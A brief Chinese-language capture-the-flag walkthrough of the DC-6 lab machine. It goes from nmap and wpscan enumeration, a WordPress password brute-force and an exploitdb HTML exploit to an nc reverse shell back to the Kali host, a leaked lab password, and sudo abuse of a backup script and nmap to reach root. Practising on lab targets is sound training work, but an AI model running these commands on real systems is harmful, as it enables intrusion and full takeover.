環境:VMware 15虛擬機軟件
DC-6靶機IP地址:192.168.146.136
Kali的IP地址:192.168.146.130
文章目錄
第一步 主機掃描
[nmap -sP 192.168.0/24]
第二步 掃描開放的端口
[nmap -sV 192.168.146.136]
第三步 訪問80端口—此時需要重定向設置
-
linux下設置
-
window下設置
第四步 掃描後臺目錄 以及賬號密碼
[wpscan --url http://wordy/ -e u]
adminsarahgrahammarkjens-
第五步 獲取登錄賬號和密碼
[wpscan --url http://wordy/ -U aa.txt -P passwd]markhelpdesk01
方法一:使用kali裏面的 wpscan爆破
方法二:使用burpSuit抓包爆破-
第六步 登錄mark賬號-
第七步 漏洞利用
我們直接複製html進行修改[cp /usr/share/exploitdb/exploits/php/webapps/45274.html 45274.html]
[vim 45274.html]
第八步 kali開啓臨時http服務 訪問45274.html頁面
[python -m SimpleHTTPServer 80]
[nc -lvvp 9999]
方法二 burpsuit抓包 進行反彈shell
[nc 192.168.146.130 9999 -e /bin/bash]
第九步 切換shell進入交互模式,並進入mark的家目錄下查找文件
python -c ‘import pty;pty.spawn("/bin/bash")’
[cd /home/mark/stuff]
[cat things-to-do.txt]
獲得 賬號/密碼 user: graham - GSo7isUM1D4
第十步 切換 graham
[ssh [email protected]]
[sudo -l]
[cd /home/jens/ ]
[cat backups.sh]
是對web的文件進行打包備份的
第十一步 寫入腳本,切換到jens賬號
[echo “/bin/bash” >> backups.sh ]
[cat backups.sh ]
[sudo -u jens ./backups.sh]
第十二步 nmap提權
[echo ‘os.execute("/bin/sh")’ > getshell]
[sudo nmap --script=getshell]
[cd /root]
[cat theflag.txt]